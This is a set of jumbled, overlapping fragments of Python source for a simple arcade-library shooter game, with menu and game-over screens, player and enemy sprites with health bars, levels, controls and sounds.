"\"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage",
"arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y =",
"health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many",
"arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level > 3 and self.window.level < 6:",
"self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\"",
"start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200,",
"class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists",
"or bullet.top < 0 or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists()",
"arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return",
"self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif",
"Calculate width based on health start_x = 85 start_y = 25 health_width =",
"False elif key == arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed",
"= ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y =",
"ints\") # Remove one health point enemy.enemy_cur_health -= 1 # Check health if",
"SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT)",
"270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to",
"get rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every",
"start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health /",
"= ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3,",
"ENEMY(arcade.Sprite): def update(self): # Rotate the coin. # The arcade.Sprite class has an",
"arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x",
"SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list",
"Use a mouse press to advance to the 'game' view. \"\"\" game_view =",
"220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\",",
"many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y",
"health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH",
"def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for health",
"enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add",
"player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for",
"right sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents must be all ints\")",
"= random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists",
"\"\"\" # Move player around the screen self.center_x += self.change_x self.center_y += self.change_y",
"arcade.run() window.level = 0 # game = MyGame() # game.setup() # arcade.run() if",
"0: self.window.level = self.updated_level + 1 else: self.good = False def setup(self): #",
"+ HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): #",
"\"\"\"Called whenever a key is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed =",
"window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level =",
"- 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the 'menu'",
"on_key_release(self, key, modifiers): \"\"\"Called when the user releases a key. \"\"\" if key",
"PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add extra attributes for",
"0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800",
"> player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x",
"the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw",
"\"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y",
"elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image,",
"enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level",
"arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove",
"# font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar # Draw",
"1 # Make sure he cant go off the screen if self.bottom <",
"arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y = 110",
"isinstance(player, PLAYER): raise TypeError(\"List contents must be all ints\") # Remove one health",
"Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self):",
"BULLET_SPEED # Add the bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\"",
"enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level +",
"= False def on_draw(self): # render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0,",
"go back to the main menu view \"\"\" if key == arcade.key.ESCAPE: menu_view",
"bullet.center_y = start_y # Get from the mouse the destination location for the",
"the screen self.center_x += self.change_x self.center_y += self.change_y # Check for out-of-bounds if",
"+ 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\"",
"Change this, and the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): #",
"class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" #",
"< player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y",
"True elif key == arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed",
"attribute that controls # the sprite rotation. Change this, and the sprite rotates.",
"arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN)",
"2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True self.window.level = 1",
"the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x",
"enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) if",
"- 1 # Make sure he cant go off the screen if self.bottom",
"in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called whenever",
"the bullet at the player's current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y",
"# Variables that will hold sprite lists self.player_list = None self.enemy_list = None",
"# Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that",
"and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y =",
"1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin. # The arcade.Sprite class",
"210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y =",
"self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) #",
"self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite)",
"HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate",
"The arcade.Sprite class has an \"angle\" attribute that controls # the sprite rotation.",
"0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this is the right",
"= 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X =",
"start_y, arcade.color.RED, 15) start_x = 360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x,",
"= 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound =",
"logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed:",
"self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound",
"self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good",
"enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level >",
"player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet",
"# Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list",
"start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health",
"sprite lists self.player_list = None self.enemy_list = None self.bullet_list = None # Set",
"self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many health the enemies have",
"= -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image,",
"= False def setup(self): # Set up the game # Sprite lists self.window.level",
"and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x =",
"how many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y",
"# Make sure this is the right sprite if not isinstance(player, PLAYER): raise",
"15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED =",
"not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all ints\") # Remove one",
"= y # Do math to calculate how to get the bullet to",
"self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update()",
"# Make sure he cant go off the screen if self.bottom < 0:",
"else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it.",
"the bullet to the destination. x_diff = dest_x - start_x y_diff = dest_y",
"when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game over",
"= arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0",
"arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT",
"keys on your keyboard to move around\", start_x, start_y, arcade.color.RED, 15) start_x =",
"12, 45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in",
"60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on health start_x =",
"your mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y =",
"self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound",
"enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the",
"= 300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def",
"start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x +",
"<= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) #",
"= arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed = False self.down_pressed =",
"arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x",
"it did, get rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() #",
"return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers):",
"move around\", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y = 240 arcade.draw_text(\"Use",
"def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\"",
".60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7",
"800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED =",
"If the bullet flies off-screen, remove it. if bullet.bottom > self.width or bullet.top",
"bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH,",
"SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5",
"# Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x =",
"window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame() # game.setup() # arcade.run()",
"over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x =",
"self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on",
"SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game",
"start_x y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking into",
"self.window.level > self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies += 2",
"enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120,",
"arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called when the user releases",
"self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level + 1 else: self.good =",
"ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120,",
"arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the player's current location start_x =",
"SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x =",
"self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed = False elif key ==",
"y # Do math to calculate how to get the bullet to the",
"0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600",
"color=arcade.color.RED) # Calculate width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health /",
"BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X",
"= start_x bullet.center_y = start_y # Get from the mouse the destination location",
"a key. \"\"\" if key == arcade.key.UP: self.up_pressed = False elif key ==",
"HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar",
"__init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add extra attributes for health self.player_max_health",
"arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50)",
"arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False",
"to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y = 110 arcade.draw_text(\"Click",
"0 # game = MyGame() # game.setup() # arcade.run() if __name__ == \"__main__\":",
"def on_mouse_press(self, x, y, button, modifiers): # Called whenever the mouse button is",
"the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE,",
"Set up the player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5",
"the user releases a key. \"\"\" if key == arcade.key.UP: self.up_pressed = False",
"that controls # the sprite rotation. Change this, and the sprite rotates. self.angle",
"if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y >",
"and change_y. Velocity is how fast the bullet travels. bullet.change_x = math.cos(angle) *",
"self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop",
"Loop through each bullet for bullet in self.bullet_list: # Check this bullet to",
"the arrow keys on your keyboard to move around\", start_x, start_y, arcade.color.RED, 15)",
"# Position the bullet at the player's current location start_x = self.player_sprite.center_x start_y",
"in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player",
"elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list:",
"player_hit: # Make sure this is the right sprite if not isinstance(player, PLAYER):",
"elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite):",
"0: self.left = 0 elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH",
"self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\"",
"start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button,",
"def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run()",
"self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y:",
"arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed = True elif key",
"self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x",
"if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all ints\") # Remove",
"self.good = True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed",
"self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) #",
"image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health =",
"self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH # Background image will",
"self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies to go",
"self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player",
"self.window.level < 6: for i in range(self.amount_of_enemies): # Create the enemy image enemy",
"stored in this variable self.background = None def levels(self): while self.good: if self.window.level",
"== arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed = False def",
"arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25,",
"SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list ==",
"= arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10)",
"bullet dest_x = x dest_y = y # Do math to calculate how",
"\"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables",
"5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\")",
"= arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound =",
"key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class.",
"self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin.",
"= player_max_health def player_draw_health_number(self): # Draw how many health the enemies have health_string",
"anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x,",
"pressed. \"\"\" if key == arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN:",
"= 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH =",
"arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers):",
"press to advance to the 'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view)",
"(self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width",
"to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\"",
"guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y",
"SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) #",
"arcade.Sprite class has an \"angle\" attribute that controls # the sprite rotation. Change",
"PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set",
"clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the",
"scale, player_max_health): super().__init__(image, scale) # Add extra attributes for health self.player_max_health = player_max_health",
"85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x",
"go to the main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y",
"be all ints\") # Remove one health point enemy.enemy_cur_health -= 1 # Check",
"= MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite)",
"dest_x - start_x y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff) #",
"Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user",
"= False self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH # Background",
"GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) #",
"lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x =",
"= self.updated_level + 1 else: self.good = False def setup(self): # Set up",
"to see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If",
"self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView()",
"start_y, arcade.color.RED, 15) start_x = 310 start_y = 240 arcade.draw_text(\"Use your mouse to",
"the menu \"\"\" arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x,",
"= 0 elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1",
"start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y,",
"enemy_draw_health_bar(self): # Draw the health bar # Draw the red background if self.enemy_cur_health",
"ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120,",
"arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\")",
"random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy)",
"== arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed = False elif",
"and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x =",
"# Calculate width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health)",
"update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level",
